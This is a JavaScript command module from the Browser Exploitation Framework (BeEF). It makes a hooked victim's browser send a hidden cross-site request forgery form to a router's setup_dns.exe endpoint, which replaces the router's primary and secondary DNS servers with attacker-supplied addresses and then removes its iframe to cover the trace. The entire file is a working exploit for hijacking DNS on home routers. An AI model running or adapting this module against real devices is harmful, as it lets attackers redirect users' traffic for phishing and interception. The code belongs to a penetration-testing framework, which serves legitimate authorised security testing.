//
// Copyright (c) 2006-2024Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {

	// config
	var target  = 'http://<%= @rhost %>/cgi-bin/setup_dns.exe';
	var dns1    = '<%= @dns1 %>';
	var dns2    = '<%= @dns2 %>';
	var timeout = 15;

	// validate primary DNS server IP address
	if (!beef.net.is_valid_ip(dns1)) {
		beef.debug('Invalid Primary DNS server IP address was provided');
		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
		return;
	}
	var parts = dns1.split('.');
	var dns1_1 = parts[0];
	var dns1_2 = parts[1];
	var dns1_3 = parts[2];
	var dns1_4 = parts[3];

	// validate secondary DNS server IP address
	if (!beef.net.is_valid_ip(dns2)) {
		beef.debug('Invalid Secondary DNS server IP address was provided');
		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided");
		return;
	}
	var parts = dns2.split('.');
	var dns2_1 = parts[0];
	var dns2_2 = parts[1];
	var dns2_3 = parts[2];
	var dns2_4 = parts[3];

	// change DNS
	var philips_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "GET", "application/x-www-form-urlencoded", [
		{'type':'hidden', 'name':'page',   'value':'setup_dns'},
		{'type':'hidden', 'name':'logout', 'value':''},
		{'type':'hidden', 'name':'dns1_1', 'value':dns1_1},
		{'type':'hidden', 'name':'dns1_2', 'value':dns1_2},
		{'type':'hidden', 'name':'dns1_3', 'value':dns1_3},
		{'type':'hidden', 'name':'dns1_4', 'value':dns1_4},
		{'type':'hidden', 'name':'dns2_1', 'value':dns2_1},
		{'type':'hidden', 'name':'dns2_2', 'value':dns2_2},
		{'type':'hidden', 'name':'dns2_3', 'value':dns2_3},
		{'type':'hidden', 'name':'dns2_4', 'value':dns2_4}
	]);

	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

	// clean up
	cleanup = function() {
		document.body.removeChild(philips_iframe_<%= @command_id %>);
	}
	setTimeout("cleanup()", timeout*1000);

});

